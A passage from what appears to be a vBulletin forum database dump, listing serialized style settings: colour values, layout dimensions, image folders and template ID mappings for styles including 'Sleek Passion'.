#0B198C\";s:28:\"vbmenu_option_link_n_fgcolor\";s:7:\"#22229C\";s:28:\"vbmenu_option_link_v_fgcolor\";s:7:\"#22229C\";s:28:\"vbmenu_option_link_m_fgcolor\";s:7:\"#FFFFFF\";s:28:\"vbmenu_hilite_link_n_fgcolor\";s:7:\"#FFFFFF\";s:28:\"vbmenu_hilite_link_v_fgcolor\";s:7:\"#FFFFFF\";s:28:\"vbmenu_hilite_link_m_fgcolor\";s:7:\"#FFFFFF\";s:16:\"body_bgcolor_hex\";s:6:\"E1E1E2\";s:16:\"body_fgcolor_hex\";s:6:\"000000\";s:16:\"page_bgcolor_hex\";s:6:\"FFFFFF\";s:16:\"page_fgcolor_hex\";s:6:\"000000\";s:19:\"tborder_bgcolor_hex\";s:6:\"D1D1E1\";s:19:\"tborder_fgcolor_hex\";s:6:\"000000\";s:16:\"tcat_bgcolor_hex\";s:6:\"869BBF\";s:16:\"tcat_fgcolor_hex\";s:6:\"FFFFFF\";s:17:\"thead_bgcolor_hex\";s:6:\"5C7099\";s:17:\"thead_fgcolor_hex\";s:6:\"FFFFFF\";s:17:\"tfoot_bgcolor_hex\";s:6:\"3E5C92\";s:17:\"tfoot_fgcolor_hex\";s:6:\"E0E0F6\";s:16:\"alt1_bgcolor_hex\";s:6:\"F5F5FF\";s:16:\"alt1_fgcolor_hex\";s:6:\"000000\";s:16:\"alt2_bgcolor_hex\";s:6:\"E1E4F2\";s:16:\"alt2_fgcolor_hex\";s:6:\"000000\";s:21:\"inlinemod_bgcolor_hex\";s:6:\"FFFFCC\";s:21:\"inlinemod_fgcolor_hex\";s:6:\"000000\";s:19:\"wysiwyg_bgcolor_hex\";s:6:\"F5F5FF\";s:19:\"wysiwyg_fgcolor_hex\";s:6:\"000000\";s:16:\"time_fgcolor_hex\";s:6:\"666686\";s:21:\"highlight_fgcolor_hex\";s:6:\"FF0000\";s:17:\"fjsel_bgcolor_hex\";s:6:\"3E5C92\";s:17:\"fjsel_fgcolor_hex\";s:6:\"E0E0F6\";s:19:\"fjdpth0_bgcolor_hex\";s:6:\"F7F7F7\";s:19:\"fjdpth0_fgcolor_hex\";s:6:\"000000\";s:17:\"panel_bgcolor_hex\";s:6:\"E4E7F5\";s:17:\"panel_fgcolor_hex\";s:6:\"000000\";s:25:\"panelsurround_bgcolor_hex\";s:6:\"D1D4E0\";s:25:\"panelsurround_fgcolor_hex\";s:6:\"000000\";s:18:\"legend_fgcolor_hex\";s:6:\"22229C\";s:26:\"vbmenu_control_bgcolor_hex\";s:6:\"738FBF\";s:26:\"vbmenu_control_fgcolor_hex\";s:6:\"FFFFFF\";s:24:\"vbmenu_popup_bgcolor_hex\";s:6:\"FFFFFF\";s:24:\"vbmenu_popup_fgcolor_hex\";s:6:\"000000\";s:25:\"vbmenu_option_bgcolor_hex\";s:6:\"BBC7CE\";s:25:\"vbmenu_option_fgcolor_hex\";s:6:\"000000\";s:25:\"vbmenu_hilite_bgcolor_hex\";s:6:\"8A949E\";s:25:\"vbmenu_hilite_fgcolor_hex\";s:6:\"FFFFFF\";s:23:\"body_link_n_fgcolor_hex\";s:6:\"22229C\";s:23:\"body_link_v_fgcolor_hex\";s:6:\"22229C\";s:23:\"body_link_m_fgcolor_hex\";s:6:\"FF4400\";s:24:\"tborder_border_color_hex\";s:6:\"0B198C\";s:23:\"tcat_link_n_fgcolor_hex\";s:6:\"FFFFFF\";s:23:\"tcat_link_v_fgcolor_hex\";s:6:\"FFFFFF\";s:23:\"tcat_link_m_fgcolor_hex\";s:6:\"FFFF66\";s:24:\"thead_link_n_fgcolor_hex\";s:6:\"FFFFFF\";s:24:\"thead_link_v_fgcolor_hex\";s:6:\"FFFFFF\";s:24:\"thead_link_m_fgcolor_hex\";s:6:\"FFFF00\";s:24:\"tfoot_link_n_fgcolor_hex\";s:6:\"E0E0F6\";s:24:\"tfoot_link_v_fgcolor_hex\";s:6:\"E0E0F6\";s:24:\"tfoot_link_m_fgcolor_hex\";s:6:\"FFFF66\";s:26:\"wysiwyg_link_n_fgcolor_hex\";s:6:\"22229C\";s:26:\"wysiwyg_link_v_fgcolor_hex\";s:6:\"22229C\";s:26:\"wysiwyg_link_m_fgcolor_hex\";s:6:\"FF4400\";s:33:\"vbmenu_control_link_n_fgcolor_hex\";s:6:\"FFFFFF\";s:33:\"vbmenu_control_link_v_fgcolor_hex\";s:6:\"FFFFFF\";s:33:\"vbmenu_control_link_m_fgcolor_hex\";s:6:\"FFFFFF\";s:29:\"vbmenu_popup_border_color_hex\";s:6:\"0B198C\";s:32:\"vbmenu_option_link_n_fgcolor_hex\";s:6:\"22229C\";s:32:\"vbmenu_option_link_v_fgcolor_hex\";s:6:\"22229C\";s:32:\"vbmenu_option_link_m_fgcolor_hex\";s:6:\"FFFFFF\";s:32:\"vbmenu_hilite_link_n_fgcolor_hex\";s:6:\"FFFFFF\";s:32:\"vbmenu_hilite_link_v_fgcolor_hex\";s:6:\"FFFFFF\";s:32:\"vbmenu_hilite_link_m_fgcolor_hex\";s:6:\"FFFFFF\";}', '\r\n ', 'a:27:{s:11:\"cellpadding\";s:1:\"6\";s:11:\"cellspacing\";s:1:\"1\";s:14:\"codeblockwidth\";s:5:\"640px\";s:10:\"formspacer\";s:1:\"3\";s:9:\"formwidth\";s:5:\"640px\";s:16:\"formwidth_usercp\";s:5:\"480px\";s:11:\"htmldoctype\";s:121:\"\";s:16:\"htmlextrasfolder\";s:10:\"htmlextras\";s:12:\"imagesfolder\";s:6:\"images\";s:13:\"imgdir_attach\";s:13:\"images/attach\";s:13:\"imgdir_button\";s:14:\"images/buttons\";s:13:\"imgdir_editor\";s:13:\"images/editor\";s:11:\"imgdir_misc\";s:11:\"images/misc\";s:11:\"imgdir_poll\";s:12:\"images/polls\";s:13:\"imgdir_rating\";s:13:\"images/rating\";s:17:\"imgdir_reputation\";s:17:\"images/reputation\";s:17:\"imgdir_statusicon\";s:17:\"images/statusicon\";s:12:\"messagewidth\";s:5:\"540px\";s:19:\"messagewidth_usercp\";s:5:\"380px\";s:16:\"outerborderwidth\";s:2:\"20\";s:15:\"outertablewidth\";s:4:\"100%\";s:10:\"spacersize\";s:2:\"25\";s:10:\"tablewidth\";s:4:\"100%\";s:16:\"textareacols_ie4\";s:2:\"70\";s:16:\"textareacols_ns4\";s:2:\"50\";s:16:\"textareacols_ns6\";s:2:\"65\";s:10:\"titleimage\";s:37:\"images/misc/vbulletin3_logo_white.gif\";}', '', 'a:8:{s:14:\"pi_button_down\";a:4:{i:0;s:7:\"#98B5E2\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:15:\"pi_button_hover\";a:4:{i:0;s:7:\"#C1D2EE\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:16:\"pi_button_normal\";a:4:{i:0;s:7:\"#E1E1E2\";i:1;s:7:\"#000000\";i:2;s:3:\"1px\";i:3;s:4:\"none\";}s:18:\"pi_button_selected\";a:4:{i:0;s:7:\"#F1F6F8\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:12:\"pi_menu_down\";a:4:{i:0;s:7:\"#98B5E2\";i:1;s:7:\"#316AC5\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:13:\"pi_menu_hover\";a:4:{i:0;s:7:\"#C1D2EE\";i:1;s:7:\"#316AC5\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:14:\"pi_menu_normal\";a:4:{i:0;s:7:\"#FFFFFF\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #FFFFFF\";}s:13:\"pi_popup_down\";a:4:{i:0;s:7:\"#98B5E2\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}}', 0, 1),
(2, 'Sleek Passion', -1, '2,-1', 'a:586:{s:18:\".alt1, .alt1Active\";s:4:\"1741\";s:18:\".alt2, .alt2Active\";s:4:\"1742\";s:5:\".alt3\";s:4:\"1163\";s:7:\".button\";s:4:\"1164\";s:8:\".fjdpth0\";s:4:\"1165\";s:8:\".fjdpth1\";s:4:\"1166\";s:8:\".fjdpth2\";s:4:\"1167\";s:8:\".fjdpth3\";s:4:\"1168\";s:8:\".fjdpth4\";s:4:\"1169\";s:6:\".fjsel\";s:4:\"1743\";s:10:\".highlight\";s:4:\"1171\";s:10:\".inlinemod\";s:4:\"1744\";s:7:\".navbar\";s:4:\"1173\";s:5:\".page\";s:4:\"1745\";s:6:\".panel\";s:4:\"1746\";s:14:\".panelsurround\";s:4:\"1747\";s:10:\".smallfont\";s:4:\"1177\";s:8:\".tborder\";s:4:\"1748\";s:5:\".tcat\";s:4:\"1749\";s:6:\".tfoot\";s:4:\"1750\";s:6:\".thead\";s:4:\"1751\";s:5:\".time\";s:4:\"1182\";s:15:\".vbmenu_control\";s:4:\"1752\";s:14:\".vbmenu_hilite\";s:4:\"1753\";s:14:\".vbmenu_option\";s:4:\"1754\";s:13:\".vbmenu_popup\";s:4:\"1755\";s:8:\".wysiwyg\";s:4:\"1756\";s:12:\"activateform\";s:4:\"1708\";s:21:\"activate_requestemail\";s:4:\"1709\";s:13:\"ad_footer_end\";s:4:\"1222\";s:15:\"ad_footer_start\";s:4:\"1223\";s:28:\"ad_forumdisplay_afterthreads\";s:4:\"1224\";s:24:\"ad_forumhome_afterforums\";s:4:\"1225\";s:13:\"ad_header_end\";s:4:\"1226\";s:14:\"ad_header_logo\";s:4:\"1227\";s:15:\"ad_navbar_below\";s:4:\"1228\";s:22:\"ad_showthread_beforeqr\";s:4:\"1229\";s:23:\"ad_showthread_firstpost\";s:4:\"1230\";s:27:\"ad_showthread_firstpost_sig\";s:4:\"1231\";s:29:\"ad_showthread_firstpost_start\";s:4:\"1232\";s:8:\"albumbit\";s:4:\"1233\";s:14:\"album_addgroup\";s:4:\"1234\";s:23:\"album_addgroup_groupbit\";s:4:\"1235\";s:10:\"album_edit\";s:4:\"1236\";s:15:\"album_latestbit\";s:4:\"1237\";s:10:\"album_list\";s:4:\"1238\";s:23:\"album_moderatedcomments\";s:4:\"1239\";s:16:\"album_picturebit\";s:4:\"1240\";s:25:\"album_picturebit_checkbox\";s:4:\"1241\";s:23:\"album_picturebit_unread\";s:4:\"1242\";s:17:\"album_picturelist\";s:4:\"1243\";s:17:\"album_pictureview\";s:4:\"1244\";s:18:\"album_picture_edit\";s:4:\"1245\";s:21:\"album_picture_editbit\";s:4:\"1246\";s:20:\"album_picture_upload\";s:4:\"1247\";s:23:\"album_picture_uploadbit\";s:4:\"1248\";s:20:\"album_unreadcomments\";s:4:\"1249\";s:12:\"announcement\";s:4:\"1250\";s:17:\"announcement_edit\";s:4:\"1251\";s:13:\"attachmentbit\";s:4:\"1710\";s:11:\"ATTACHMENTS\";s:4:\"1711\";s:11:\"bbcode_code\";s:4:\"1252\";s:19:\"bbcode_code_styleid\";i:-1;s:21:\"bbcode_code_printable\";s:4:\"1253\";s:11:\"bbcode_html\";s:4:\"1254\";s:19:\"bbcode_html_styleid\";i:-1;s:21:\"bbcode_html_printable\";s:4:\"1255\";s:10:\"bbcode_php\";s:4:\"1256\";s:18:\"bbcode_php_styleid\";i:-1;s:20:\"bbcode_php_printable\";s:4:\"1257\";s:12:\"bbcode_quote\";s:4:\"1258\";s:20:\"bbcode_quote_styleid\";i:-1;s:22:\"bbcode_quote_printable\";s:4:\"1259\";s:22:\"board_inactive_warning\";s:4:\"1712\";s:4:\"body\";s:4:\"1757\";s:9:\"BUDDYLIST\";s:4:\"1260\";s:12:\"buddylistbit\";s:4:\"1261\";s:8:\"CALENDAR\";s:4:\"1262\";s:12:\"calendarjump\";s:4:\"1263\";s:15:\"calendarjumpbit\";s:4:\"1264\";s:13:\"calendar_edit\";s:4:\"1265\";s:25:\"calendar_edit_customfield\";s:4:\"1266\";s:24:\"calendar_edit_recurrence\";s:4:\"1267\";s:15:\"calendar_manage\";s:4:\"1268\";s:16:\"calendar_monthly\";s:4:\"1269\";s:25:\"calendar_monthly_birthday\";s:4:\"1270\";s:20:\"calendar_monthly_day\";s:4:\"1271\";s:26:\"calendar_monthly_day_other\";s:4:\"1272\";s:22:\"calendar_monthly_event\";s:4:\"1273\";s:23:\"calendar_monthly_header\";s:4:\"1274\";s:21:\"calendar_monthly_week\";s:4:\"1275\";s:17:\"CALENDAR_REMINDER\";s:4:\"1276\";s:28:\"calendar_reminder_choosetype\";s:4:\"1277\";s:26:\"calendar_reminder_eventbit\";s:4:\"1278\";s:22:\"calendar_showbirthdays\";s:4:\"1279\";s:19:\"calendar_showevents\";s:4:\"1280\";s:22:\"calendar_showeventsbit\";s:4:\"1281\";s:34:\"calendar_showeventsbit_customfield\";s:4:\"1282\";s:23:\"calendar_smallmonth_day\";s:4:\"1283\";s:29:\"calendar_smallmonth_day_other\";s:4:\"1284\";s:26:\"calendar_smallmonth_header\";s:4:\"1285\";s:24:\"calendar_smallmonth_week\";s:4:\"1286\";s:15:\"calendar_weekly\";s:4:\"1287\";s:19:\"calendar_weekly_day\";s:4:\"1288\";s:21:\"calendar_weekly_event\";s:4:\"1289\";s:15:\"calendar_yearly\";s:4:\"1290\";s:11:\"cellpadding\";s:4:\"1195\";s:11:\"cellspacing\";s:4:\"1196\";s:14:\"codeblockwidth\";s:4:\"1197\";s:9:\"contactus\";s:4:\"1713\";s:16:\"contactus_option\";s:4:\"1714\";s:8:\"converse\";s:4:\"1715\";s:19:\"editor_clientscript\";s:4:\"1291\";s:10:\"editor_css\";s:4:\"1292\";s:21:\"editor_jsoptions_font\";s:4:\"1293\";s:21:\"editor_jsoptions_size\";s:4:\"1294\";s:13:\"editor_smilie\";s:4:\"1295\";s:16:\"editor_smiliebox\";s:4:\"1296\";s:25:\"editor_smiliebox_category\";s:4:\"1297\";s:20:\"editor_smiliebox_row\";s:4:\"1298\";s:26:\"editor_smiliebox_straggler\";s:4:\"1299\";s:25:\"editor_styles_button_down\";s:4:\"1300\";s:26:\"editor_styles_button_hover\";s:4:\"1301\";s:27:\"editor_styles_button_normal\";s:4:\"1302\";s:29:\"editor_styles_button_selected\";s:4:\"1303\";s:23:\"editor_styles_menu_down\";s:4:\"1304\";s:24:\"editor_styles_menu_hover\";s:4:\"1305\";s:25:\"editor_styles_menu_normal\";s:4:\"1306\";s:24:\"editor_styles_popup_down\";s:4:\"1307\";s:18:\"editor_toolbar_off\";s:4:\"1308\";s:17:\"editor_toolbar_on\";s:4:\"1309\";s:8:\"editpoll\";s:4:\"1716\";s:8:\"editpost\";s:4:\"1717\";s:5:\"EXTRA\";s:4:\"1189\";s:6:\"EXTRA2\";s:4:\"1758\";s:3:\"FAQ\";s:4:\"1310\";s:6:\"faqbit\";s:4:\"1311\";s:11:\"faqbit_link\";s:4:\"1312\";s:6:\"footer\";s:4:\"1919\";s:10:\"formspacer\";s:4:\"1198\";s:9:\"formwidth\";s:4:\"1199\";s:16:\"formwidth_usercp\";s:4:\"1200\";s:12:\"FORUMDISPLAY\";s:4:\"1313\";s:25:\"forumdisplay_loggedinuser\";s:4:\"1314\";s:22:\"forumdisplay_moderator\";s:4:\"1315\";s:22:\"forumdisplay_sortarrow\";s:4:\"1316\";s:9:\"FORUMHOME\";s:4:\"1317\";s:21:\"forumhome_birthdaybit\";s:4:\"1318\";s:15:\"forumhome_event\";s:4:\"1319\";s:32:\"forumhome_forumbit_level1_nopost\";s:4:\"1320\";s:30:\"forumhome_forumbit_level1_post\";s:4:\"1321\";s:32:\"forumhome_forumbit_level2_nopost\";s:4:\"1322\";s:30:\"forumhome_forumbit_level2_post\";s:4:\"1770\";s:20:\"forumhome_lastpostby\";s:4:\"1324\";s:22:\"forumhome_loggedinuser\";s:4:\"1325\";s:25:\"forumhome_markread_script\";s:4:\"1326\";s:19:\"forumhome_moderator\";s:4:\"1327\";s:28:\"forumhome_subforumbit_nopost\";s:4:\"1328\";s:26:\"forumhome_subforumbit_post\";s:4:\"1329\";s:34:\"forumhome_subforumseparator_nopost\";s:4:\"1330\";s:32:\"forumhome_subforumseparator_post\";s:4:\"1331\";s:9:\"forumjump\";s:4:\"1719\";s:10:\"forumrules\";s:4:\"1720\";s:13:\"GENERIC_SHELL\";s:4:\"1721\";s:8:\"gobutton\";s:4:\"1722\";s:6:\"header\";s:4:\"1920\";s:11:\"headinclude\";s:4:\"1922\";s:12:\"help_avatars\";s:4:\"1332\";s:19:\"help_avatars_avatar\";s:4:\"1333\";s:21:\"help_avatars_category\";s:4:\"1334\";s:16:\"help_avatars_row\";s:4:\"1335\";s:12:\"help_bbcodes\";s:4:\"1336\";s:19:\"help_bbcodes_bbcode\";s:4:\"1337\";s:17:\"help_bbcodes_link\";s:4:\"1338\";s:10:\"help_rules\";s:4:\"1339\";s:12:\"help_smilies\";s:4:\"1340\";s:21:\"help_smilies_category\";s:4:\"1341\";s:19:\"help_smilies_smilie\";s:4:\"1342\";s:11:\"htmldoctype\";s:4:\"1201\";s:16:\"htmlextrasfolder\";s:4:\"1202\";s:17:\"humanverify_image\";s:4:\"1343\";s:20:\"humanverify_question\";s:4:\"1344\";s:21:\"humanverify_recaptcha\";s:4:\"1345\";s:12:\"imagesfolder\";s:4:\"1203\";s:13:\"imgdir_attach\";s:4:\"1760\";s:13:\"imgdir_button\";s:4:\"1761\";s:13:\"imgdir_editor\";s:4:\"1762\";s:11:\"imgdir_misc\";s:4:\"1763\";s:11:\"imgdir_poll\";s:4:\"1764\";s:13:\"imgdir_rating\";s:4:\"1765\";s:17:\"imgdir_reputation\";s:4:\"1766\";s:17:\"imgdir_statusicon\";s:4:\"1767\";s:6:\"im_aim\";s:4:\"1346\";s:6:\"im_icq\";s:4:\"1347\";s:10:\"im_message\";s:4:\"1348\";s:6:\"im_msn\";s:4:\"1349\";s:11:\"im_send_aim\";s:4:\"1350\";s:11:\"im_send_icq\";s:4:\"1351\";s:11:\"im_send_msn\";s:4:\"1352\";s:13:\"im_send_skype\";s:4:\"1353\";s:13:\"im_send_yahoo\";s:4:\"1354\";s:8:\"im_skype\";s:4:\"1355\";s:8:\"im_yahoo\";s:4:\"1356\";s:12:\"JOINREQUESTS\";s:4:\"1725\";s:15:\"joinrequestsbit\";s:4:\"1726\";s:6:\"legend\";s:4:\"1191\";s:8:\"lightbox\";s:4:\"1727\";s:6:\"lostpw\";s:4:\"1728\";s:8:\"mailform\";s:4:\"1729\";s:10:\"MEMBERINFO\";s:4:\"1357\";s:19:\"memberinfo_albumbit\";s:4:\"1358\";s:16:\"memberinfo_block\";s:4:\"1359\";s:24:\"memberinfo_block_aboutme\";s:4:\"1360\";s:23:\"memberinfo_block_albums\";s:4:\"1361\";s:28:\"memberinfo_block_contactinfo\";s:4:\"1362\";s:24:\"memberinfo_block_friends\";s:4:\"1363\";s:29:\"memberinfo_block_friends_mini\";s:4:\"1364\";s:23:\"memberinfo_block_groups\";s:4:\"1365\";s:28:\"memberinfo_block_infractions\";s:4:\"1366\";s:26:\"memberinfo_block_ministats\";s:4:\"1367\";s:29:\"memberinfo_block_profilefield\";s:4:\"1368\";s:31:\"memberinfo_block_profilepicture\";s:4:\"1369\";s:31:\"memberinfo_block_recentvisitors\";s:4:\"1370\";s:27:\"memberinfo_block_statistics\";s:4:\"1371\";s:33:\"memberinfo_block_visitormessaging\";s:4:\"1372\";s:14:\"memberinfo_css\";s:4:\"1373\";s:27:\"memberinfo_customfield_edit\";s:4:\"1374\";s:25:\"memberinfo_deletemessages\";s:4:\"1375\";s:16:\"memberinfo_imbit\";s:4:\"1376\";s:24:\"memberinfo_infractionbit\";s:4:\"1377\";s:25:\"memberinfo_membergroupbit\";s:4:\"1378\";s:23:\"memberinfo_profilefield\";s:4:\"1379\";s:32:\"memberinfo_profilefield_category\";s:4:\"1380\";s:25:\"memberinfo_publicgroupbit\";s:4:\"1381\";s:20:\"memberinfo_quickedit\";s:4:\"1382\";s:16:\"memberinfo_small\";s:4:\"1383\";s:25:\"memberinfo_socialgroupbit\";s:4:\"1384\";s:30:\"memberinfo_socialgroupbit_text\";s:4:\"1385\";s:15:\"memberinfo_tiny\";s:4:\"1386\";s:18:\"memberinfo_usercss\";s:4:\"1387\";s:21:\"memberinfo_visitorbit\";s:4:\"1388\";s:25:\"memberinfo_visitormessage\";s:4:\"1389\";s:33:\"memberinfo_visitormessage_deleted\";s:4:\"1390\";s:40:\"memberinfo_visitormessage_global_ignored\";s:4:\"1391\";s:33:\"memberinfo_visitormessage_ignored\";s:4:\"1392\";s:10:\"memberlist\";s:4:\"1393\";s:17:\"memberlist_letter\";s:4:\"1394\";s:21:\"memberlist_resultsbit\";s:4:\"1395\";s:27:\"memberlist_resultsbit_field\";s:4:\"1396\";s:25:\"memberlist_results_header\";s:4:\"1397\";s:17:\"memberlist_search\";s:4:\"1398\";s:32:\"memberlist_search_optional_input\";s:4:\"1399\";s:23:\"memberlist_search_radio\";s:4:\"1400\";s:24:\"memberlist_search_select\";s:4:\"1401\";s:33:\"memberlist_search_select_multiple\";s:4:\"1402\";s:25:\"memberlist_search_textbox\";s:4:\"1403\";s:12:\"messagewidth\";s:4:\"1212\";s:19:\"messagewidth_usercp\";s:4:\"1213\";s:25:\"moderation_deletepictures\";s:4:\"1404\";s:17:\"moderation_filter\";s:4:\"1405\";s:27:\"moderation_groupdiscussions\";s:4:\"1406\";s:24:\"moderation_groupmessages\";s:4:\"1407\";s:21:\"moderation_picturebit\";s:4:\"1408\";s:26:\"moderation_picturecomments\";s:4:\"1409\";s:19:\"moderation_pictures\";s:4:\"1410\";s:16:\"moderation_posts\";s:4:\"1411\";s:18:\"moderation_threads\";s:4:\"1412\";s:26:\"moderation_visitormessages\";s:4:\"1413\";s:17:\"modifyattachments\";s:4:\"1414\";s:20:\"modifyattachmentsbit\";s:4:\"1415\";s:12:\"modifyavatar\";s:4:\"1416\";s:15:\"modifyavatarbit\";s:4:\"1417\";s:22:\"modifyavatarbit_custom\";s:4:\"1418\";s:24:\"modifyavatarbit_noavatar\";s:4:\"1419\";s:21:\"modifyavatar_category\";s:4:\"1420\";s:15:\"modifybuddylist\";s:4:\"1421\";s:20:\"modifybuddylist_user\";s:4:\"1422\";s:16:\"modifyignorelist\";s:4:\"1423\";s:21:\"modifyignorelist_user\";s:4:\"1424\";s:13:\"modifyoptions\";s:4:\"1425\";s:22:\"modifyoptions_timezone\";s:4:\"1426\";s:23:\"modifyoptions_vbtwitter\";s:4:\"1779\";s:14:\"modifypassword\";s:4:\"1427\";s:17:\"modifyprivacy_bit\";s:4:\"1428\";s:13:\"modifyprofile\";s:4:\"1429\";s:16:\"modifyprofilepic\";s:4:\"1430\";s:20:\"modifyprofileprivacy\";s:4:\"1431\";s:22:\"modifyprofile_birthday\";s:4:\"1432\";s:15:\"modifysignature\";s:4:\"1433\";s:13:\"modifyusercss\";s:4:\"1434\";s:27:\"modifyusercss_backgroundbit\";s:4:\"1435\";s:27:\"modifyusercss_backgroundrow\";s:4:\"1436\";s:17:\"modifyusercss_bit\";s:4:\"1437\";s:19:\"modifyusercss_error\";s:4:\"1438\";s:24:\"modifyusercss_error_link\";s:4:\"1439\";s:25:\"modifyusercss_headinclude\";s:4:\"1440\";s:16:\"modifyusergroups\";s:4:\"1441\";s:27:\"modifyusergroups_displaybit\";s:4:\"1442\";s:28:\"modifyusergroups_groupleader\";s:4:\"1443\";s:31:\"modifyusergroups_joinrequestbit\";s:4:\"1444\";s:26:\"modifyusergroups_memberbit\";s:4:\"1445\";s:29:\"modifyusergroups_nonmemberbit\";s:4:\"1446\";s:30:\"modifyusergroups_requesttojoin\";s:4:\"1447\";s:22:\"modifyuserlist_confirm\";s:4:\"1448\";s:26:\"modifyuserlist_headinclude\";s:4:\"1449\";s:6:\"navbar\";s:4:\"1450\";s:11:\"navbar_link\";s:4:\"1451\";s:16:\"navbar_noticebit\";s:4:\"1452\";s:28:\"navbar_notifications_menubit\";s:4:\"1453\";s:13:\"newattachment\";s:4:\"1454\";s:16:\"newattachmentbit\";s:4:\"1455\";s:26:\"newattachment_errormessage\";s:4:\"1456\";s:20:\"newattachment_keybit\";s:4:\"1457\";s:7:\"newpoll\";s:4:\"1458\";s:18:\"newpost_attachment\";s:4:\"1459\";s:21:\"newpost_attachmentbit\";s:4:\"1460\";s:28:\"newpost_disablesmiliesoption\";s:4:\"1461\";s:20:\"newpost_errormessage\";s:4:\"1462\";s:15:\"newpost_preview\";s:4:\"1463\";s:13:\"newpost_quote\";s:4:\"1464\";s:20:\"newpost_threadmanage\";s:4:\"1465\";s:20:\"newpost_usernamecode\";s:4:\"1466\";s:8:\"newreply\";s:4:\"1467\";s:18:\"newreply_reviewbit\";s:4:\"1468\";s:25:\"newreply_reviewbit_ignore\";s:4:\"1469\";s:32:\"newreply_reviewbit_ignore_global\";s:4:\"1470\";s:9:\"newthread\";s:4:\"1471\";s:8:\"optgroup\";s:4:\"1730\";s:6:\"option\";s:4:\"1731\";s:16:\"outerborderwidth\";s:4:\"1214\";s:15:\"outertablewidth\";s:4:\"1768\";s:7:\"pagenav\";s:4:\"1472\";s:15:\"pagenav_curpage\";s:4:\"1473\";s:16:\"pagenav_pagelink\";s:4:\"1474\";s:19:\"pagenav_pagelinkrel\";s:4:\"1475\";s:26:\"picturecomment_commentarea\";s:4:\"1476\";s:18:\"picturecomment_css\";s:4:\"1477\";s:29:\"picturecomment_deletemessages\";s:4:\"1478\";s:21:\"picturecomment_editor\";s:4:\"1479\";s:19:\"picturecomment_form\";s:4:\"1480\";s:22:\"picturecomment_message\";s:4:\"1481\";s:30:\"picturecomment_message_deleted\";s:4:\"1482\";s:37:\"picturecomment_message_global_ignored\";s:4:\"1483\";s:30:\"picturecomment_message_ignored\";s:4:\"1484\";s:36:\"picturecomment_message_moderatedview\";s:4:\"1485\";s:22:\"picturecomment_preview\";s:4:\"1486\";s:16:\"pm_editfolderbit\";s:4:\"1487\";s:14:\"pm_editfolders\";s:4:\"1488\";s:14:\"pm_emptyfolder\";s:4:\"1489\";s:9:\"pm_filter\";s:4:\"1490\";s:14:\"pm_messagelist\";s:4:\"1491\";s:17:\"pm_messagelistbit\";s:4:\"1492\";s:24:\"pm_messagelistbit_ignore\";s:4:\"1493\";s:22:\"pm_messagelistbit_user\";s:4:\"1494\";s:26:\"pm_messagelist_periodgroup\";s:4:\"1495\";s:9:\"pm_movepm\";s:4:\"1496\";s:8:\"pm_newpm\";s:4:\"1497\";s:19:\"pm_nomessagehistory\";s:4:\"1498\";s:15:\"pm_popup_script\";s:4:\"1499\";s:13:\"pm_quickreply\";s:4:\"1500\";s:11:\"pm_receipts\";s:4:\"1501\";s:14:\"pm_receiptsbit\";s:4:\"1502\";s:9:\"pm_showpm\";s:4:\"1503\";s:10:\"pm_trackpm\";s:4:\"1504\";s:11:\"polleditbit\";s:4:\"1505\";s:10:\"pollnewbit\";s:4:\"1506\";s:10:\"polloption\";s:4:\"1507\";s:17:\"polloptions_table\";s:4:\"1508\";s:19:\"polloption_multiple\";s:4:\"1509\";s:11:\"pollpreview\";s:4:\"1510\";s:10:\"pollresult\";s:4:\"1511\";s:11:\"pollresults\";s:4:\"1512\";s:17:\"pollresults_table\";s:4:\"1513\";s:7:\"postbit\";s:4:\"1514\";s:18:\"postbit_attachment\";s:4:\"1515\";s:23:\"postbit_attachmentimage\";s:4:\"1516\";s:27:\"postbit_attachmentmoderated\";s:4:\"1517\";s:27:\"postbit_attachmentthumbnail\";s:4:\"1518\";s:21:\"postbit_automoderated\";s:4:\"1519\";s:15:\"postbit_deleted\";s:4:\"1520\";s:16:\"postbit_external\";s:4:\"1521\";s:14:\"postbit_ignore\";s:4:\"1522\";s:21:\"postbit_ignore_global\";s:4:\"1523\";s:10:\"postbit_ip\";s:4:\"1524\";s:14:\"postbit_legacy\";s:4:\"1525\";s:20:\"postbit_onlinestatus\";s:4:\"1526\";s:17:\"postbit_quickedit\";s:4:\"1527\";s:18:\"postbit_reputation\";s:4:\"1528\";s:15:\"postbit_wrapper\";s:4:\"1529\";s:11:\"posthistory\";s:4:\"1530\";s:27:\"posthistory_content_changed\";s:4:\"1531\";s:31:\"posthistory_content_not_changed\";s:4:\"1532\";s:19:\"posthistory_listbit\";s:4:\"1533\";s:11:\"posticonbit\";s:4:\"1534\";s:9:\"posticons\";s:4:\"1535\";s:11:\"printthread\";s:4:\"1536\";s:14:\"printthreadbit\";s:4:\"1537\";s:21:\"printthreadbit_ignore\";s:4:\"1538\";s:8:\"register\";s:4:\"1539\";s:18:\"register_coppaform\";s:4:\"1540\";s:14:\"register_rules\";s:4:\"1541\";s:19:\"register_verify_age\";s:4:\"1542\";s:10:\"reportitem\";s:4:\"1732\";s:10:\"reputation\";s:4:\"1543\";s:13:\"reputationbit\";s:4:\"1544\";s:15:\"reputation_ajax\";s:4:\"1545\";s:21:\"reputation_reasonbits\";s:4:\"1546\";s:19:\"reputation_yourpost\";s:4:\"1547\";s:13:\"search_forums\";s:4:\"1548\";s:14:\"search_results\";s:4:\"1549\";s:22:\"search_results_postbit\";s:4:\"1550\";s:32:\"search_results_postbit_lastvisit\";s:4:\"1551\";s:6:\"select\";s:4:\"1192\";s:12:\"sendtofriend\";s:4:\"1733\";s:11:\"shell_blank\";s:4:\"1734\";s:10:\"SHOWGROUPS\";s:4:\"1552\";s:19:\"showgroups_forumbit\";s:4:\"1553\";s:20:\"showgroups_usergroup\";s:4:\"1554\";s:23:\"showgroups_usergroupbit\";s:4:\"1555\";s:10:\"SHOWTHREAD\";s:4:\"1556\";s:23:\"showthread_bookmarksite\";s:4:\"1557\";s:15:\"showthread_list\";s:4:\"1558\";s:21:\"showthread_quickreply\";s:4: